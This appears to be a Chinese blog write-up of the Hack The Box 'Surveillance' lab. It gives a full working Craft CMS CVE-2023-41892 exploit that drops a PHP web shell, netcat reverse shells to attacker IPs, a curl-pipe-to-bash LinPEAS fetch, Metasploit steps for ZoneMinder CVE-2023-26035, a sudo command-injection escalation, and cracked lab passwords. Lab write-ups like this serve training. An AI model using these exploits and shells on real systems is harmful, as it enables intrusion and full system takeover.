HTB | Surveillance CVE-2023-41892 CVE-2023-26035

最新推荐文章于 2024-07-04 10:34:37 发布
最新推荐文章于 2024-07-04 10:34:37 发布
阅读量990 收藏 14
点赞数 12
分类专栏: HTB 文章标签: 安全 web安全 网络安全 系统安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49288916/article/details/135188943
版权

HTB | Surveillance CVE-2023-41892 CVE-2023-26035

使用nmap进行端口扫描

nmap -sV -sC -v -oN Surveillance.log 10.10.11.245  

# Nmap 7.93 scan initiated Mon Dec 18 08:57:23 2023 as: nmap -sV -sC -v -oN Surveillance.log 10.10.11.245
Nmap scan report for 10.10.11.245
Host is up (0.56s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96071cc6773e07a0cc6f2419744d570b (ECDSA)
|_  256 0ba4c0cfe23b95aef6f5df7d0c88d6ce (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
1080/tcp open  socks5  (Username/password authentication required)
| socks-auth-info: 
|   No authentication
|   No authentication
|_  Username and password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 18 08:58:03 2023 -- 1 IP address (1 host up) scanned in 39.68 seconds

使用gobuster进行目录扫描

gobuster dir -u http://surveillance.htb --wordlist=/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -q -t 200 -x .php,.zip,.txt,.html

使用谷歌搜索craft cms 4.4.14 rce 找到**CVE-2023-41892**

import requests
import re
import sys

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36"
}

def writePayloadToTempFile(documentRoot):

    data = {
        "action": "conditions/render",
        "configObject[class]": "craft\elements\conditions\ElementCondition",
        "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/etc/passwd"}}}'
    }

    files = {
        "image1": ("pwn1.msl", """<?xml version="1.0" encoding="UTF-8"?>
        <image>
        <read filename="caption:&lt;?php @system(@$_REQUEST['cmd']); ?&gt;"/>
        <write filename="info:DOCUMENTROOT/cpresources/shell.php" />
        </image>""".replace("DOCUMENTROOT", documentRoot), "text/plain")
    }

    response = requests.post(url, headers=headers, data=data, files=files)

def getTmpUploadDirAndDocumentRoot():
    data = {
        "action": "conditions/render",
        "configObject[class]": "craft\elements\conditions\ElementCondition",
        "config": r'{"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
    }

    response = requests.post(url, headers=headers, data=data, proxies={"http": "http://127.0.0.1:8080"})

    pattern1 = r'<tr><td class="e">upload_tmp_dir<\/td><td class="v">(.*?)<\/td><td class="v">(.*?)<\/td><\/tr>'
    pattern2 = r'<tr><td class="e">\$_SERVER\[\'DOCUMENT_ROOT\'\]<\/td><td class="v">([^<]+)<\/td><\/tr>'
   
    match1 = re.search(pattern1, response.text, re.DOTALL)
    match2 = re.search(pattern2, response.text, re.DOTALL)
    return match1.group(1), match2.group(1)

def trigerImagick(tmpDir):
    
    data = {
        "action": "conditions/render",
        "configObject[class]": "craft\elements\conditions\ElementCondition",
        "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:' + tmpDir + r'/php*"}}}'
    }
    response = requests.post(url, headers=headers, data=data)    

def shell(cmd):
    response = requests.get(url + "/cpresources/shell.php", params={"cmd": cmd})
    match = re.search(r'caption:(.*?)CAPTION', response.text, re.DOTALL)

    if match:
        extracted_text = match.group(1).strip()
        print(extracted_text)
    else:
        return None
    return extracted_text

if __name__ == "__main__":
    if(len(sys.argv) != 2):
        print("Usage: python CVE-2023-41892.py <url>")
        exit()
    else:
        url = sys.argv[1]
        print("[-] Get temporary folder and document root ...")
        upload_tmp_dir, documentRoot = getTmpUploadDirAndDocumentRoot()
        tmpDir = "/tmp" if "no value" in upload_tmp_dir else upload_tmp_dir
        print("[-] Write payload to temporary file ...")
        try:
            writePayloadToTempFile(documentRoot)
        except requests.exceptions.ConnectionError as e:
            print("[-] Crash the php process and write temp file successfully")

        print("[-] Trigger imagick to write shell ...")
        try:
            trigerImagick(tmpDir)
        except:
            pass

        print("[-] Done, enjoy the shell")
        while True:
            cmd = input("$ ")
            shell(cmd)

使用python执行POC,直接上线web权限

python CVE-2023-41892.py http://surveillance.htb

在这里插入图片描述

查看目录文件及用户id

在这里插入图片描述

反弹个nc维持稳定远程权限

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.3 5566  >/tmp/f

在这里插入图片描述

在/var/www/html/craft/storage/backups中发现一个sql的压缩包,使用python开启http服务,访问并下载文件

python3 -m http.server 1144

在这里插入图片描述

在sql备份文件中发现一个hash值

echo “39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec” > hash

在这里插入图片描述

使用hash-identifier识别hash属性,识别出来为SHA-256,Haval-256

hash-identifier

在这里插入图片描述

使用hashcat 进行爆破

hashcat -m 1400 hash  /usr/share/wordlists/rockyou.txt

starcraft122490

在这里插入图片描述

登录到matthew用户

ssh matthew@10.10.11.245

在这里插入图片描述

user flag

0c7e023577d0e134ff4ddd0cf687d448

查看内核版本

uname -a
cat /proc/version
ubuntu 5.15

在这里插入图片描述

使用python开启http服务使用LinPEAS找隐私信息

curl http://10.10.16.3:4455/linpeas.sh | bash

在这里插入图片描述

数据库密码

ZoneMinderPassword2023

在这里插入图片描述

数据库密码

CraftCMSPassword2023!

在这里插入图片描述

登录到mysql

mysql -u craftuser -D craftdb -pCraftCMSPassword2023!

查询表单

show tables;

在这里插入图片描述

查询字段

select  * from users;

在这里插入图片描述

看到一个hash

$2y$13$FoVGcLXXNe81B6x9bKry9OzGSSIYL7/ObcmQ0CXtgw.EpuNcx8tGe

使用john进行爆破

john --wordlist=/usr/share/wordlists/rockyou.txt  hash

爆破失败

使用linpeas扫描发现开启了8080端口

在这里插入图片描述

使用ssh进行端口转发至本地

ssh -L 8080:localhost:8080 matthew@10.10.11.245

在这里插入图片描述

本机访问8080端口

在这里插入图片描述

在谷歌搜索

zoneminder exploit

在这里插入图片描述

搜索到**CVE-2023-26035**漏洞

网上现成的exp

git clone https://github.com/rvizx/CVE-2023-26035.git
cd CVE-2023-26035
python exploit.py -t "http://127.0.0.1:8080/index.php" -ip 10.10.16.16 -p 5566

在这里插入图片描述

这里我们使用的是metasploit

msfconsole 
use exploit/unix/webapp/zoneminder_snapshots 
show options 
set rhosts 127.0.0.1
set rport 8080
set targeturi /index.php/
set lhost 10.10.16.16
exploit

在这里插入图片描述

进入目标主机cmd

shell
whoami
script /dev/null -c bash
sudo -l

在这里插入图片描述

使用python 临时开启http服务传输shell脚本进行反弹

BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件。 BusyBox 包含了一些简单的工具,例如ls、cat和echo等等,还包含了一些更大、更复杂的工具,例grep、find、mount以及telnet。 有些人将 BusyBox 称为 Linux 工具里的瑞士军刀

#!/bin/bash
busybox nc 10.10.16.16 5566 -e sh

使用sudo执行shell脚本 pass中的密码是上文linpeas找到的

sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/shell1.sh)' --pass=ZoneMinderPassword2023

nc开启监听上线

在这里插入图片描述

ec2fb16d285ebcb18e1a5e1725587b9c

1888吉利数保存一下

在这里插入图片描述

强少张
关注
  • 12
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-10977:Gitlab v12.4.0-8.1 RCE
05-07
用法以通常的方式启动反向shell处理程序,然后使用以下命令运行此脚本: TARGET_URI= " https://target " TARGET_EMAIL_DOMAIN= " laboratory.htb " \ TARGET_USER= " test " TARGET_PASSWORD= " Test pass 123 " \ ...
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
[漏洞复现] Craft (CVE-2023-41892)
k5664524的博客
01-17 434
Craft CMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞。Craft CMS 是一个用于创建数字体验的平台。这是一种高影响力、低复杂性的攻击媒介。
【漏洞复现】craft cms 远程代码执行漏洞CVE-2023-41892
rm -rf *
10-18 1529
Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞。
漏洞分析|Craft CMS 远程代码执行漏洞 (CVE-2023-41892)
xuandaoren的博客
09-27 1439
Pixel&tonic Craft CMS 是美国 Pixel&tonic 公司的一套内容管理系统(CMS)。在 4.4.15 之前的版本中,存在一个远程代码执行漏洞。Craft CMS 是一个用于创建数字体验的平台,这是一个高影响、低复杂性的攻击向量。2.详细描述受影响的 Craft CMS 版本存在代码注入漏洞,该漏洞源于远程代码执行漏洞。为了缓解此问题,建议运行 4.4.15 之前版本的用户至少更新到 4.4.15 版本。此问题已在 Craft CMS 4.4.15 中得到修复。漏洞严重性。
CVE-2023-41892 漏洞复现
Jay17的博客
02-14 1380
CVE-2023-41892 漏洞复现
WuThreat身份安全云-TVD每日漏洞情报-2023-02-28
wuthreat无胁科技的博客
03-02 228
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-26035,CNNVD-202302-2019。
HTB Hospital——CVE-2023-35001,CVE-2023-2640-CVE-2023-32629,CVE-2023-36664
q
12-17 397
查看htdocs权限,发现有system权限,文件夹是system权限的,那么webshell拿到的也应该是system的,上传个web后门进行提权。————本文章仅用于学习记录,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。在c盘看见一个xammp的文件----XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包。登录到8080WEB端口,注册一个用户进入发现一个文件上传点。
HTB Keeper CVE-2023-32784
q
01-09 439
登录进去发现一个lnorgaard用户在他的备注中说的,初始密码设置为Welcome2023!带●的是遗失的,第二个字符是猜测的,有些wp不懂就去看资料,说●像o,又懂完了,别误人子弟。把域名及子域名添加到hosts,发现一个登录框,以及是RT 4.4.4版本。下载putty工具,并将其转成openssh格式的id_rsa文件。解压后发现是一个dmp文件,dmp文件是系统错误产生的文件。使用G搜索,密码为:rødgrød med fløde。使用sudo -l查看使用有sudo权限,并没有。
HTB_Netmon CVE-2018-9276 RCE漏洞复现
网络安全学习
04-20 482
PTRG CVE-2018-9276 RCE漏洞复现
HTB-areo
2201_75378806的博客
06-01 695
端口扫描根据 IIS 版本,主机可能运行现代 Windows 操作系统(Window 10/11 或 Server 2016+)。访问80底下有一个上传自定义主题的表单尝试上传图片会失败,他需要.theme和.themepack扩展名制作一个虚拟文件test.theme并上传它该网站还表示将测试该主题,这意味着有人会打开它底部有一封电子邮件。页面上的所有链接都指向同一页面的其他部分。没有什么有用的进行目录爆破。
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
最新发布
亚信安全官方账号的博客
07-04 297
亚信安全发布2024年6月威胁态势
网络安全&密码学—python中的各种加密算法
xt350488的博客
07-02 1081
数据加密是一种保护数据安全的技术,通过将数据(明文)转换为不易被未经授权的人理解的形式(密文),以防止数据泄露、篡改或滥用。加密后的数据(密文)可以通过解密过程恢复成原始数据(明文)。数据加密的核心是密码学,它是研究密码系统或通信安全的一门学科,包括密码编码学和密码分析学。在网络安全和密码学领域,数据加密是保护数据机密性、完整性和可用性的关键技术。Python作为一种功能强大的编程语言,提供了多种实现数据加密和解密的方法。
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 870
然后这一步,你看,这里有个决策点
Conmi的正确答案——ESP32-C3开启安全下载模式
Conmi的博客
07-03 362
IDF版本:4.4.7。
CVE-2023-4016
08-17
很抱歉,我没有找到与您提到的CVE-2023-4016相关的引用资料。是否有其他问题我可以帮助您解答?<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [HTB HARD 靶机 Cerberus WriteUp](https://blog.csdn.net/qq_58869808/article/details/129786875)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [weblogic漏洞总结 复现(未完)](https://blog.csdn.net/weixin_30558305/article/details/97564170)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值